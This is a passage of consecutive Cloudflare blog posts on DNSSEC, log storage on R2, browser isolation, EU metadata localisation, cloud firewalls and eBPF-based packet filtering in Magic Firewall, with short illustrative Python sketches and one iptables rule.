Both can be achieved by having the primary nameserver sign the domain and transfer its DNS records, plus the record signatures, to the secondary nameserver, which serves both as-is. This setup is supported with Cloudflare Secondary DNS today. What cannot be supported when transferring pre-signed zones are non-standard DNS features like country-level steering. This is where Multi-Signer DNSSEC comes in: both DNS providers need to know the signing keys of the other provider and perform their own online (or on-the-fly) signing. If you’re curious to learn more about how Multi-Signer DNSSEC works, check out this excellent blog post published by APNIC.
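
A toy model of why this works: each provider signs with its own keys, and resolvers validate successfully because both providers publish the union of the signing keys in the DNSKEY RRset. The key names here are placeholders, and real validation involves actual cryptographic signatures rather than simple membership checks.

```python
# Toy keys standing in for each provider's zone-signing keys (ZSKs).
provider_a_keys = {"zsk-a"}
provider_b_keys = {"zsk-b"}

# Under the multi-signer model, both providers publish the union of the
# keys, so a response signed by either provider validates against the
# DNSKEY RRset a resolver fetches.
published_dnskey_rrset = provider_a_keys | provider_b_keys

def validates(rrsig_signer_key: str) -> bool:
    return rrsig_signer_key in published_dnskey_rrset
```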

Last but not least, Cloudflare is joining the DNS Operations, Analysis, and Research Center (DNS-OARC) as a gold member. Together with other researchers and operators of DNS infrastructure, we want to tackle the most challenging problems and continuously work on implementing new standards and features.

While we’ve been at DNS since day one of Cloudflare, we’re still just getting started. We know there are more granular and specific features our future customers will ask of us, and the launch of Foundation DNS is our stake in the ground that we will continue to invest in all levels of DNS while building the most feature-rich enterprise DNS platform on the planet. If you have ideas, let us know what you’ve always dreamed your DNS provider would do. If you want to help build these features, we are hiring.

Store your Cloudflare logs on R2

Post Syndicated from Tanushree Sharma original https://blog.cloudflare.com/store-your-cloudflare-logs-on-r2/

We’re excited to announce that customers will soon be able to store their Cloudflare logs on Cloudflare R2 storage. Storing your logs on Cloudflare gives CIOs and Security Teams an opportunity to consolidate their infrastructure, creating simplicity, savings, and additional security.

Cloudflare protects your applications from malicious traffic, speeds up connections, and keeps bad actors out of your network. The logs we produce from our products help customers answer questions like:

  • Why are requests being blocked by the Firewall rules I’ve set up?
  • Why are my users seeing disconnects from my applications that use Spectrum?
  • Why am I seeing a spike in Cloudflare Gateway requests to a specific application?

Storage on R2 adds to our existing suite of logging products. Storing logs on R2 fills in gaps that our customers have been asking for: a cost-effective solution to store logs for any of our products for any period of time.

Goodbye to old school logging

Let’s rewind to the early 2000s. Most organizations were running their own self-managed infrastructure: network devices, firewalls, servers, and all the associated software. Each company had to manage logs coming from hundreds of sources in the IT stack. With dedicated storage needed to retain an endless volume of logs, specialized teams were required to build an ETL pipeline and make the data actionable.

Fast-forward to the 2010s. Organizations are transitioning to using managed services for their IT functions. As a result of this shift, the way that customers collect logs for all their services has changed too. With managed services, much of the logging load is shifted off of the customer.

The challenge now: collecting logs from a combination of managed services, each of which has its own quirks. Logs can be sent at varying latencies and in different formats; some are too detailed, while others are not detailed enough. To gain a single-pane view of their IT infrastructure, companies need to build or buy a SIEM solution.
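
The normalization burden looks roughly like this sketch: each managed service emits its own event shape, and the pipeline must map every shape onto one common schema before the data is useful. The vendor field names here are invented for illustration.

```python
def normalize(event: dict) -> dict:
    """Map two invented vendor event shapes onto one common schema."""
    if "ts" in event:  # vendor A: epoch seconds in "ts", source in "src"
        return {"timestamp": event["ts"], "source_ip": event["src"]}
    # vendor B: ISO timestamp in "EventTime", source in "ClientIP"
    return {"timestamp": event["EventTime"], "source_ip": event["ClientIP"]}
```

Multiply this by dozens of services, each with its own latencies and quirks, and the appeal of a single consolidated source becomes clear.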

Cloudflare replaces these sets of managed services. When a customer onboards to Cloudflare, we make it super easy for them to gain visibility into the traffic that hits our network. We’ve built analytics for many of our products, such as CDN, Firewall, Magic Transit, and Spectrum, to both view high-level trends and dig into patterns by slicing and dicing data.

Analytics are a great way to see data at an aggregate level, but we know that raw logs are important to our customers as well, so we’ve built out a set of logging products.

Logging today

During Speed Week we announced Instant Logs, which shows customers their traffic as it hits their domain. Instant Logs is perfect for live debugging and triaging use cases: monitor your traffic, make a config change, and instantly view its impact. In cases where you need to retroactively inspect your logs, we have Logpush.

We’ve built an impressive logging pipeline to get data from the 250+ cities that house our data centers to our customers in under a minute using Logpush. If your organization has existing practices for getting data across your stack into one place, we support Logpush to a variety of cloud storage or SIEM destinations. We also have partnerships in place with major SIEM platforms to surface Cloudflare data in ways that are meaningful to our customers.
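
For illustration, here is roughly what the body of a Logpush job-create call looks like (POST /zones/:zone_id/logpush/jobs). The destination string, field list, and names below are placeholder values; check the API documentation for the exact options your dataset supports.

```python
def logpush_job_payload(dataset: str, destination: str, fields: list) -> dict:
    """Build the JSON body for a Logpush job-create call. The destination
    uses an S3-style URI purely as an example; R2 and SIEM destinations
    are configured with their own URI schemes."""
    return {
        "name": f"{dataset}-to-storage",
        "dataset": dataset,
        "destination_conf": destination,
        "logpull_options": "fields=" + ",".join(fields) + "&timestamps=rfc3339",
        "enabled": True,
    }

job = logpush_job_payload(
    "http_requests",
    "s3://my-log-bucket/cloudflare?region=us-east-1",  # placeholder bucket
    ["ClientIP", "EdgeStartTimestamp", "RayID"],
)
```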

Last but not least is Logpull. Using Logpull, customers can access HTTP request logs using our REST API. Our customers like Logpull because it’s easy to configure, they don’t have to worry about storing logs with a third party, and they can pull data ad hoc for up to seven days.
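
A minimal sketch of an ad hoc Logpull query: build the URL for the logs/received endpoint with a start/end window and the fields you want. The zone ID is a placeholder, and the fields shown are a small illustrative subset.

```python
from datetime import datetime, timedelta, timezone

def logpull_url(zone_id: str, minutes_back: int = 60) -> str:
    """Build a GET URL for /zones/:zone_id/logs/received. Logs lag real
    time slightly, so the window ends a few minutes in the past."""
    fmt = "%Y-%m-%dT%H:%M:%SZ"
    end = datetime.now(timezone.utc) - timedelta(minutes=5)
    start = end - timedelta(minutes=minutes_back)
    return (
        "https://api.cloudflare.com/client/v4/zones/"
        f"{zone_id}/logs/received"
        f"?start={start.strftime(fmt)}&end={end.strftime(fmt)}"
        "&fields=ClientIP,ClientRequestURI,EdgeResponseStatus"
    )

url = logpull_url("zone123")  # "zone123" stands in for a real zone ID
```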

Why Cloudflare storage?

The top four requests we’ve heard from customers when it comes to logs are:

  • I have tight budgets and need low cost log storage.
  • They should be low effort to set up and maintain.
  • I should be able to store logs for as long as I need to.
  • I want to access my logs on Cloudflare for any product.

For many of our customers, Cloudflare is one of the most important data sources, and it also generates more data than other applications in their IT stack. R2 is significantly cheaper than other cloud providers, so our customers don’t need to compromise by sampling or leaving out logs from products altogether in order to cut down on costs.

Just like the simplicity of Logpull, log storage on R2 will be quick and easy. With a one-click setup, we’ll store your logs, and you don’t have to worry about any configuration details. Retention is totally in our customers’ control to match the security and compliance needs of their business. With R2, you can also store your logs for any products we have logging for today (and we’re always adding more as our product line expands).

Log storage; we’re just getting started

With log storage on Cloudflare, we’re creating the building blocks that allow customers to perform log analysis and forensics directly on Cloudflare. Whether you are conducting an investigation, responding to a support request, or addressing an incident, using analytics for a bird’s-eye view and inspecting logs to determine the root cause is a powerful combination.

If you’re interested in getting notified when you can store your logs on Cloudflare, sign up through this form.

We’re always looking for talented engineers to take on the challenges of working with data at an incredible scale. If you’re interested, apply here.

Control input on suspicious sites with Cloudflare Browser Isolation

Post Syndicated from Tim Obezuk original https://blog.cloudflare.com/phishing-protection-browser/

Your team can now use Cloudflare’s Browser Isolation service to protect against phishing attacks and credential theft inside the web browser. Users can browse more of the Internet without taking on the risk. Administrators can define Zero Trust policies to prohibit keyboard input and transmitting files during high risk browsing activity.

Earlier this year, Cloudflare Browser Isolation introduced data protection controls that take advantage of the remote browser’s ability to manage all input and outputs between a user and any website. We’re excited to extend that functionality to apply more controls such as prohibiting keyboard input and file uploads to avert phishing attacks and credential theft on high risk and unknown websites.

Challenges defending against unknown threats

Administrators protecting their teams from threats on the open Internet typically implement a Secure Web Gateway (SWG) to filter Internet traffic based on threat intelligence feeds. This is effective at mitigating known threats, but in reality, not all websites fit neatly into malicious or non-malicious categories.

For example, a parked domain with typo differences to an established web property could be legitimately registered for an unrelated product or become weaponized as a phishing attack. False positives are tolerated by risk-averse administrators, but they come at the cost of employee productivity. Finding the balance between these needs is a fine art; when filtering is applied too aggressively, it leads to user frustration and an increased support burden from micromanaging exceptions for blocked traffic.

Legacy secure web gateways are blunt instruments that provide security teams limited options to protect their teams from threats on the Internet. Simply allowing or blocking websites is not enough, and modern security teams need more sophisticated tools to fully protect their teams without compromising on productivity.

Intelligent filtering with Cloudflare Gateway

Cloudflare Gateway provides a secure web gateway to customers wherever their users work. Administrators can build rules that include blocking security risks, scanning for viruses, or restricting browsing based on SSO group identity among other options. User traffic leaves their device and arrives at a Cloudflare data center close to them, providing security and logging without slowing them down.

Unlike the blunt instruments of the past, Cloudflare Gateway applies security policies based on the unique magnitude of data Cloudflare’s network processes. For example, Cloudflare sees just over one trillion DNS queries every day. We use that data to build a comprehensive model of what “good” DNS queries look like — and which DNS queries are anomalous and could represent DNS tunneling for data exfiltration, for example. We use our network to build more intelligent filtering and reduce false positives. You can review that research as well with Cloudflare Radar.

However, we know some customers want to allow users to navigate to destinations in a sort of “neutral” zone. Domains that are newly registered, or newly seen by DNS resolvers, can be the home of a great new service for your team or a surprise attack to steal credentials. Cloudflare works to categorize these as soon as possible, but in those initial minutes users have to request exceptions if your team blocks these categories outright.

Safely browsing the unknown

Cloudflare Browser Isolation shifts the risk of executing untrusted or malicious website code from the user’s endpoint to a remote browser hosted in a low-latency data center. Rather than aggressively blocking unknown websites, and potentially impacting employee productivity, Cloudflare Browser Isolation provides administrators control over how users can interact with risky websites.

Cloudflare’s network intelligence tracks higher-risk Internet properties such as Typosquatting and New Domains. Websites in these categories could be benign, or they could be phishing attacks waiting to be weaponized. Risk-averse administrators can protect their teams without introducing false positives by isolating these websites and serving them in a read-only mode that disables file uploads, downloads, and keyboard input.
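
Conceptually, the resulting policy behaves like this sketch: risky categories are isolated and stripped of interaction rather than blocked outright. The category and option names are illustrative, not the exact Gateway API identifiers.

```python
RISKY_CATEGORIES = {"typosquatting", "new_domain"}

def http_policy(category: str) -> dict:
    """Return the action for a site category: isolate risky categories
    in read-only mode instead of blocking them outright."""
    if category in RISKY_CATEGORIES:
        return {
            "action": "isolate",
            "disable_keyboard": True,
            "disable_upload": True,
            "disable_download": True,
        }
    return {"action": "allow"}
```

The user still sees the page, but nothing typed or transmitted can leave the remote browser.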

Users are able to safely browse the unknown website without the risk of leaking credentials, transmitting files, or falling victim to a phishing attack. Should a user have a legitimate reason to interact with an unknown website, they are advised to contact their administrator to obtain elevated permissions while browsing it.

See our developer documentation to learn more about remote browser policies.

Getting started

Cloudflare Browser Isolation is integrated natively into Cloudflare’s Secure Web Gateway and Zero Trust Network Access services, and unlike legacy remote browser isolation solutions does not require IT teams to piece together multiple disparate solutions or force users to change their preferred web browser.

The Zero Trust threat and data protection that Browser Isolation provides make it a natural extension for any company trusting a secure web gateway to protect their business. We’re currently including it with our Cloudflare for Teams Enterprise Plan at no additional charge.1 Get started at our Zero Trust web page.


1. For the first 2,000 seats until 31 Dec 2021

Introducing the Customer Metadata Boundary

Post Syndicated from Jon Levine original https://blog.cloudflare.com/introducing-the-customer-metadata-boundary/

Data localisation has gotten a lot of attention in recent years because a number of countries see it as a way of controlling or protecting their citizens’ data. Countries such as Australia, China, India, Brazil, and South Korea have adopted, or are currently considering, regulations that assert legal sovereignty over their citizens’ personal data in some fashion: health care data must be stored locally; public institutions may only contract with local service providers; and so on.

In the EU, the recent “Schrems II” decision resulted in additional requirements for companies that transfer personal data outside the EU. And a number of highly regulated industries require that specific types of personal data stay within the EU’s borders.

Cloudflare is committed to helping our customers keep personal data in the EU. Last year, we introduced the Data Localisation Suite, which gives customers control over where their data is inspected and stored.

Today, we’re excited to introduce the Customer Metadata Boundary, which expands the Data Localisation Suite to ensure that a customer’s end user traffic metadata stays in the EU.

Metadata: a primer

“Metadata” can be a scary term, but it’s a simple concept — it just means “data about data.” In other words, it’s a description of activity that happened on our network. Every service on the Internet collects metadata in some form, and it’s vital to user safety and network availability.

At Cloudflare, we collect metadata about the usage of our products for several purposes:

  • Serving analytics via our dashboards and APIs
  • Sharing logs with customers
  • Stopping security threats such as bot or DDoS attacks
  • Improving the performance of our network
  • Maintaining the reliability and resiliency of our network

What does that collection look like in practice at Cloudflare? Our network consists of dozens of services: our Firewall, Cache, DNS Resolver, DDoS protection systems, Workers runtime, and more. Each service emits structured log messages, which contain fields like timestamps, URLs, usage of Cloudflare features, and the identifier of the customer’s account and zone.

These messages do not contain the contents of customer traffic, and so they do not contain things like usernames, passwords, personal information, and other private details of customers’ end users. However, these logs may contain end-user IP addresses, which are considered personal data in the EU.

Data Localisation in the EU

The EU’s General Data Protection Regulation, or GDPR, is one of the world’s most comprehensive (and well known) data privacy laws. The GDPR does not, however, insist that personal data must stay in Europe. Instead, it provides a number of legal mechanisms to ensure that GDPR-level protections are available for EU personal data if it is transferred outside the EU to a third country like the United States. Data transfers from the EU to the US were, until recently, permitted under an agreement called the EU-U.S. Privacy Shield Framework.

Shortly after the GDPR went into effect, a privacy activist named Max Schrems filed suit against Facebook for their data collection practices. In July 2020, the Court of Justice of the EU issued the “Schrems II” ruling — which, among other things, invalidated the Privacy Shield framework. However, the court upheld other valid transfer mechanisms that ensure EU personal data won’t be accessed by U.S. government authorities in a way that violates the GDPR.

Since the Schrems II decision, many customers have asked us how we’re protecting EU citizens’ data. Fortunately, Cloudflare has had data protection safeguards in place since well before the Schrems II case, such as our industry-leading commitments on government data requests. In response to Schrems II in particular, we updated our customer Data Processing Addendum (DPA). We incorporated the latest Standard Contractual Clauses, which are legal agreements approved by the EU Commission that enable data transfer. We also added additional safeguards as outlined in the EDPB’s June 2021 Recommendations on Supplementary Measures. Finally, Cloudflare’s services are certified under the ISO 27701 standard, which maps to the GDPR’s requirements.

In light of these measures, we believe that our EU customers can use Cloudflare’s services in a manner consistent with GDPR and the Schrems II decision. Still, we recognize that many of our customers want their EU personal data to stay in the EU. For example, some of our customers in industries like healthcare, law, and finance may have additional requirements. For that reason, we have developed an optional suite of services to address those requirements. We call this our Data Localisation Suite.

How the Data Localisation Suite helps today

Data Localisation is challenging for customers because of the volume and variety of data they handle. When it comes to their Cloudflare traffic, we’ve found that customers are primarily concerned about three areas:

  1. How do I ensure my encryption keys stay in the EU?
  2. How can I ensure that services like caching and WAF only run in the EU?
  3. How can I ensure that metadata is never transferred outside the EU?

To address the first concern, Cloudflare has long offered Keyless SSL and Geo Key Manager, which ensure that private SSL/TLS key material never leaves the EU. Keyless SSL ensures that Cloudflare never has possession of the private key material at all; Geo Key Manager uses Keyless SSL under the hood to ensure the keys never leave the specified region.

Last year we addressed the second concern with Regional Services, which ensures that Cloudflare will only be able to decrypt and inspect the content of HTTP traffic inside the EU. In other words, SSL connections will only be terminated in Europe, and all of our layer 7 security and performance services will only run in our EU data centers.

Today, we’re enabling customers to address the third and final concern, and keep metadata local as well.

How the Metadata Boundary Works

The Customer Metadata Boundary ensures, simply, that end user traffic metadata that can identify a customer stays in the EU. This includes all the logs and analytics that a customer sees.

How are we able to do this? All the metadata that can identify a customer flows through a single service at our edge, before being forwarded to one of our core data centers.

When the Metadata Boundary is enabled for a customer, our edge ensures that any log message that identifies that customer (that is, contains that customer’s Account ID) is not sent outside the EU. It will only be sent to our core data center in the EU, and not our core data center in the US.
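
In pseudocode terms, the edge’s routing decision looks like this sketch; the account IDs and destination names are invented for illustration.

```python
EU_BOUNDED_ACCOUNTS = {"acct-eu-1"}  # accounts with the boundary enabled

def core_destinations(log_message: dict) -> list:
    """Decide which core data centers may receive a log message:
    messages for opted-in accounts are only forwarded to the EU core."""
    if log_message.get("account_id") in EU_BOUNDED_ACCOUNTS:
        return ["core-eu"]
    return ["core-eu", "core-us"]
```

Because every identifying log message passes through this single chokepoint, enforcing the boundary is one check rather than a change to dozens of services.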

What’s next

Today our Data Localisation Suite is focused on helping our customers in the EU localise data for their inbound HTTP traffic. This includes our Cache, Firewall, DDoS protection, and Bot Management products.

We’ve heard from customers that they want data localisation for more products and more regions. This means making all of our Data Localisation Products, including Geo Key Manager and Regional Services, work globally. We’re also working on expanding the Metadata Boundary to include our Zero Trust products like Cloudflare for Teams. Stay tuned!

Replace your hardware firewalls with Cloudflare One

Post Syndicated from Ankur Aggarwal original https://blog.cloudflare.com/replace-your-hardware-firewalls-with-cloudflare-one/

Today, we’re excited to announce new capabilities to help customers make the switch from hardware firewall appliances to a true cloud-native firewall built for next-generation networks. Cloudflare One provides a secure, performant, and Zero Trust-enabled platform for administrators to apply consistent security policies across all of their users and resources. Best of all, it’s built on top of our global network, so you never need to worry about scaling, deploying, or maintaining your edge security hardware.

As part of this announcement, Cloudflare launched the Oahu program today to help customers leave legacy hardware behind; in this post we’ll break down the new capabilities that solve the problems of previous firewall generations and save IT teams time and money.

How did we get here?

In order to understand where we are today, it’ll be helpful to start with a brief history of IP firewalls.

Stateless packet filtering for private networks

The first generation of network firewalls were designed mostly to meet the security requirements of private networks, which started with the castle and moat architecture we defined as Generation 1 in our post yesterday. Firewall administrators could build policies around signals available at layers 3 and 4 of the OSI model (primarily IPs and ports), which was perfect for (e.g.) enabling a group of employees on one floor of an office building to access servers on another via a LAN.

This packet filtering capability was sufficient until networks got more complicated, including by connecting to the Internet. IT teams began needing to protect their corporate network from bad actors on the outside, which required more sophisticated policies.

Better protection with stateful & deep packet inspection

Firewall hardware evolved to include stateful packet inspection and the beginnings of deep packet inspection, extending basic firewall concepts by tracking the state of connections passing through them. This enabled administrators to (e.g.) block all incoming packets not tied to an already present outgoing connection.

These new capabilities provided more sophisticated protection from attackers. But the advancement came at a cost: supporting this higher level of security required more compute and memory resources. These requirements meant that security and network teams had to get better at planning the capacity they’d need for each new appliance and make tradeoffs between cost and redundancy for their network.

In addition to cost tradeoffs, these new firewalls provided only some insight into how the network was used. You could tell users were accessing 198.51.100.10 on port 80, but further investigation into what those users were accessing would require a reverse lookup of the IP address. That alone would only land you at the front page of the provider, with no insight into what was accessed, the reputation of the domain/host, or any other information to help answer “Is this a security event I need to investigate further?” Determining the source would be difficult as well: it would require correlating a private IP address handed out via DHCP with a device, and then subsequently with a user (assuming you remembered to set long lease times and never shared devices).

Application awareness with next generation firewalls

To address these challenges, the industry introduced the Next Generation Firewall (NGFW). These were the long-reigning corporate edge security devices, and in some cases they still are the industry standard. They adopted all the capabilities of previous generations while adding application awareness to help administrators gain more control over what passed through their security perimeter. NGFWs introduced the concept of vendor-provided or externally provided application intelligence: the ability to identify individual applications from traffic characteristics. That intelligence could then be fed into policies defining what users could and couldn’t do with a given application.

As more applications moved to the cloud, NGFW vendors started to provide virtualized versions of their appliances. These allowed administrators to no longer worry about lead times for the next hardware version and allowed greater flexibility when deploying to multiple locations.

Over the years, as the threat landscape continued to evolve and networks became more complex, NGFWs started to build in additional security capabilities, some of which helped consolidate multiple appliances. Depending on the vendor, these included VPN Gateways, IDS/IPS, Web Application Firewalls, and even things like Bot Management and DDoS protection. But even with these features, NGFWs had their drawbacks: administrators still needed to spend time designing and configuring redundant (at least primary/secondary) appliances, choosing which locations had firewalls, and accepting performance penalties from backhauling traffic there from other locations. And still, careful IP address management was required when creating policies that used addresses as a stand-in for identity.

Adding user-level controls to move toward Zero Trust

As firewall vendors added more sophisticated controls, in parallel, a paradigm shift for network architecture was introduced to address the security concerns introduced as applications and users left the organization’s “castle” for the Internet. Zero Trust security means that no one is trusted by default from inside or outside the network, and verification is required from everyone trying to gain access to resources on the network. Firewalls started incorporating Zero Trust principles by integrating with identity providers (IdPs) and allowing users to build policies around user groups — “only Finance and HR can access payroll systems” — enabling finer-grained control and reducing the need to rely on IP addresses to approximate identity.

These policies have helped organizations lock down their networks and get closer to Zero Trust, but CIOs are still left with problems: what happens when they need to integrate another organization’s identity provider? How do they safely grant access to corporate resources for contractors? And these new controls don’t address the fundamental problems with managing hardware, which still exist and are getting more complex as companies go through business changes like adding and removing locations or embracing hybrid forms of work. CIOs need a solution that works for the future of corporate networks, instead of trying to duct tape together solutions that address only some aspects of what they need.

The cloud-native firewall for next-generation networks

Cloudflare is helping customers build the future of their corporate networks by unifying network connectivity and Zero Trust security. Customers who adopt the Cloudflare One platform can deprecate their hardware firewalls in favor of a cloud-native approach, making IT teams’ lives easier by solving the problems of previous generations.

Connect any source or destination with flexible on-ramps

Rather than managing different devices for different use cases, all traffic across your network — from data centers, offices, cloud properties, and user devices — should be able to flow through a single global firewall. Cloudflare One enables you to connect to the Cloudflare network with a variety of flexible on-ramp methods including network-layer (GRE or IPsec tunnels) or application-layer tunnels, direct connections, BYOIP, and a device client. Connectivity to Cloudflare means access to our entire global network, which eliminates many of the challenges with physical or virtualized hardware:

  • No more capacity planning: The capacity of your firewall is the capacity of Cloudflare’s global network (currently >100Tbps and growing).
  • No more location planning: Cloudflare’s Anycast network architecture enables traffic to connect automatically to the closest location to its source. No more picking regions or worrying about where your primary/backup appliances are — redundancy and failover are built in by default.
  • No maintenance downtimes: Improvements to Cloudflare’s firewall capabilities, like all of our products, are deployed continuously across our global edge.
  • DDoS protection built in: No need to worry about DoS attacks overwhelming your firewalls; Cloudflare’s network automatically blocks attacks close to their source and sends only the clean traffic on to its destination.

Configure comprehensive policies, from packet filtering to Zero Trust

Cloudflare One policies can be used to secure and route your organization’s traffic across all of these on-ramps. Policies can be crafted using all the same attributes available through a traditional NGFW, while expanding to include Zero Trust attributes as well, drawing on one or more IdPs or endpoint security providers.

When looking strictly at layers 3 through 5 of the OSI model, policies can be based on IP, port, protocol, and other attributes, in both a stateless and stateful manner. These attributes can also be used to build your private network on Cloudflare in conjunction with any of the identity attributes and the Cloudflare device client.

Additionally, to help relieve the burden of managing IP allow/block lists, Cloudflare provides a set of managed lists that can be applied to both stateless and stateful policies. And on the more sophisticated end, you can also perform deep packet inspection and write programmable packet filters to enforce a positive security model and thwart the largest of attacks.
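
As a toy model of these stateless rules, the function below checks a managed IP list first and otherwise default-denies everything except TCP/443. The list contents and rule shapes are invented for illustration.

```python
import ipaddress

# A stand-in for a managed IP list of known-bad sources.
MANAGED_BLOCKLIST = [ipaddress.ip_network("198.51.100.0/24")]

def evaluate(packet: dict) -> str:
    """Evaluate a packet against ordered stateless rules:
    managed-list block first, then an allow rule, then default-deny."""
    src = ipaddress.ip_address(packet["src_ip"])
    if any(src in net for net in MANAGED_BLOCKLIST):
        return "block"
    if packet.get("protocol") == "tcp" and packet.get("dst_port") == 443:
        return "allow"
    return "block"  # positive security model: deny anything unmatched
```

The final fall-through line is the positive security model in miniature: only explicitly allowed traffic passes.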

Cloudflare’s intelligence helps power our application and content categories for our Layer 7 policies, which can be used to protect your users from security threats, prevent data exfiltration, and audit usage of company resources. This starts with our protected DNS resolver, which is built on top of our performance-leading consumer 1.1.1.1 service. Protected DNS allows administrators to protect their users from navigating to or resolving any known or potential security risks. Once a domain is resolved, administrators can apply HTTP policies to intercept, inspect, and filter a user’s traffic. And if those web applications are self-hosted or SaaS-enabled, you can even protect them using a Cloudflare Access policy, which acts as a web-based identity proxy.

Last but not least, to help prevent data exfiltration, administrators can lock down access to external HTTP applications by utilizing remote browser isolation. And coming soon, administrators will be able to log and filter which commands a user can execute over an SSH session.

Simplify policy management: one click to propagate rules everywhere

Traditional firewalls required deploying policies on each device or configuring and maintaining an orchestration tool to help with this process. In contrast, Cloudflare allows you to manage policies across our entire network from a simple dashboard or API, or use Terraform to deploy infrastructure as code. Changes propagate across the edge in seconds thanks to our Quicksilver technology. Users can get visibility into traffic flowing through the firewall with logs, which are now configurable.

Consolidating multiple firewall use cases in one platform

Firewalls need to cover a myriad of traffic flows to satisfy different security needs, including blocking bad inbound traffic, filtering outbound connections to ensure employees and applications are only accessing safe resources, and inspecting internal (“East/West”) traffic flows to enforce Zero Trust. Different hardware often covers one or multiple use cases at different locations; we think it makes sense to consolidate these as much as possible to improve ease of use and establish a single source of truth for firewall policies. Let’s walk through some use cases that were traditionally satisfied with hardware firewalls and explain how IT teams can satisfy them with Cloudflare One.

Protecting a branch office

Traditionally, IT teams needed to provision at least one hardware firewall per office location (multiple for redundancy). This involved forecasting the amount of traffic at a given branch and ordering, installing, and maintaining the appliance(s). Now, customers can connect branch office traffic to Cloudflare from whatever hardware they already have — any standard router that supports GRE or IPsec will work — and control filtering policies across all of that traffic from Cloudflare’s dashboard.

Step 1: Establish a GRE or IPsec tunnel
The majority of mainstream hardware providers support GRE and/or IPsec as tunneling methods. Cloudflare will provide an Anycast IP address to use as the tunnel endpoint on our side, and you configure a standard GRE or IPsec tunnel with no additional steps — the Anycast IP provides automatic connectivity to every Cloudflare data center.

Step 2: Configure network-layer firewall rules
All IP traffic can be filtered through Magic Firewall, which includes the ability to construct policies based on any packet characteristic — e.g., source or destination IP, port, protocol, country, or bit field match. Magic Firewall also integrates with IP Lists and includes advanced capabilities like programmable packet filtering.

Step 3: Upgrade traffic for application-level firewall rules
After it flows through Magic Firewall, TCP and UDP traffic can be “upgraded” for fine-grained filtering through Cloudflare Gateway. This upgrade unlocks a full suite of filtering capabilities including application and content awareness, identity enforcement, SSH/HTTP proxying, and DLP.

Protecting a high-traffic data center or VPC

Firewalls used for processing data at a high-traffic headquarters or data center location can be some of the largest capital expenditures in an IT team’s budget. Traditionally, data centers have been protected by beefy appliances that can handle high volumes gracefully, which comes at an increased cost. With Cloudflare’s architecture, because every server across our network can share the responsibility of processing customer traffic, no one device creates a bottleneck or requires expensive specialized components. Customers can on-ramp traffic to Cloudflare with BYOIP, a standard tunnel mechanism, or Cloudflare Network Interconnect, and process up to terabits per second of traffic through firewall rules smoothly.

Protecting a roaming or hybrid workforce

In order to connect to corporate resources or get secure access to the Internet, users in traditional network architectures establish a VPN connection from their devices to a central location where firewalls are located. There, their traffic is processed before it’s allowed to its final destination. This architecture introduces performance penalties, and while modern firewalls can enable user-level controls, they don’t necessarily achieve Zero Trust. Cloudflare enables customers to use a device client as an on-ramp to Zero Trust policies; watch out for more updates later this week on how to smoothly deploy the client at scale.

What’s next

We can’t wait to keep evolving this platform to serve new use cases. We’ve heard from customers who are interested in expanding NAT Gateway functionality through Cloudflare One, who want richer analytics, reporting, and user experience monitoring across all our firewall capabilities, and who are excited to adopt a full suite of DLP features across all of their traffic flowing through Cloudflare’s network. Updates on these areas and more are coming soon (stay tuned).

Cloudflare’s new firewall capabilities are available for enterprise customers today. Learn more here and check out the Oahu Program to learn how you can migrate from hardware firewalls to Zero Trust — or talk to your account team to get started today.

How We Used eBPF to Build Programmable Packet Filtering in Magic Firewall

Post Syndicated from Chris J Arges original https://blog.cloudflare.com/programmable-packet-filtering-with-magic-firewall/

Cloudflare actively protects services from sophisticated attacks day after day. For users of Magic Transit, DDoS protection detects and drops attacks, while Magic Firewall allows custom packet-level rules, enabling customers to deprecate hardware firewall appliances and block malicious traffic at Cloudflare’s network edge. The types and sophistication of attacks continue to evolve, as recent DDoS and reflection attacks against VoIP services targeting protocols such as Session Initiation Protocol (SIP) have shown. Fighting these attacks requires pushing the limits of packet filtering beyond what traditional firewalls are capable of. We did this by taking best-in-class technologies and combining them in new ways to turn Magic Firewall into a blazing fast, fully programmable firewall that can stand up to even the most sophisticated of attacks.

Magical Walls of Fire

Magic Firewall is a distributed stateless packet firewall built on Linux nftables. It runs on every server, in every Cloudflare data center around the world. To provide isolation and flexibility, each customer’s nftables rules are configured within their own Linux network namespace.

[Diagram: the life of an example packet when using Magic Transit with Magic Firewall]

This diagram shows the life of an example packet when using Magic Transit, which has Magic Firewall built in. First, packets enter the server and DDoS protections are applied, dropping attacks as early as possible. Next, the packet is routed into a customer-specific network namespace, which applies that customer’s nftables rules to the packet. After this, packets are routed back to the origin via a GRE tunnel. Magic Firewall users can construct firewall statements through a single API, using a flexible Wirefilter syntax. In addition, rules can be configured via the Cloudflare dashboard, using friendly drag-and-drop UI elements.

Magic Firewall provides a very powerful syntax for matching on various packet parameters, but it is also limited to the matches provided by nftables. While this is more than sufficient for many use cases, it does not provide enough flexibility to implement the advanced packet parsing and content matching we want. We needed more power.

Hello eBPF, meet Nftables!

When looking to add more power to your Linux networking stack, Extended Berkeley Packet Filter (eBPF) is a natural choice. With eBPF, you can insert packet processing programs that execute in the kernel, giving you the flexibility of familiar programming paradigms with the speed of in-kernel execution. Cloudflare loves eBPF, and this technology has been transformative in enabling many of our products. Naturally, we wanted to find a way to use eBPF to extend our use of nftables in Magic Firewall: specifically, to match using an eBPF program as a rule within a table and chain. That way we could have our cake and eat it too, keeping our existing infrastructure and code while extending it further.

If nftables could leverage eBPF natively, this story would be much shorter; alas, we had to continue our quest. As a starting point in our search, we knew that iptables integrates with eBPF. For example, one can use iptables and a pinned eBPF program for dropping packets with the following command:

iptables -A INPUT -m bpf --object-pinned /sys/fs/bpf/match -j DROP

This clue helped to put us on the right path. Iptables uses the xt_bpf extension to match on an eBPF program. This extension uses the BPF_PROG_TYPE_SOCKET_FILTER eBPF program type, which allows us to load the packet information from the socket buffer and return a value based on our code.

Since we know iptables can use eBPF, why not just use that? Magic Firewall currently leverages nftables, which is a great choice for our use case due to its flexibility in syntax and programmable interface. Thus, we need to find a way to use the xt_bpf extension with nftables.

[Diagram: the relationship between iptables, nftables, and the kernel]

This diagram helps explain the relationship between iptables, nftables and the kernel. The nftables API can be used by both the iptables and nft userspace programs, and can configure both xtables matches (including xt_bpf) and normal nftables matches.

This means that given the right API calls (netlink/netfilter messages), we can embed an xt_bpf match within an nftables rule. In order to do this, we need to understand which netfilter messages we need to send. By using tools such as strace and Wireshark, and especially by reading the source, we were able to construct a message that could append an eBPF rule to a given table and chain.

NFTA_RULE_TABLE table
NFTA_RULE_CHAIN chain
NFTA_RULE_EXPRESSIONS | NFTA_MATCH_NAME
	NFTA_LIST_ELEM | NLA_F_NESTED
	NFTA_EXPR_NAME "match"
		NLA_F_NESTED | NFTA_EXPR_DATA
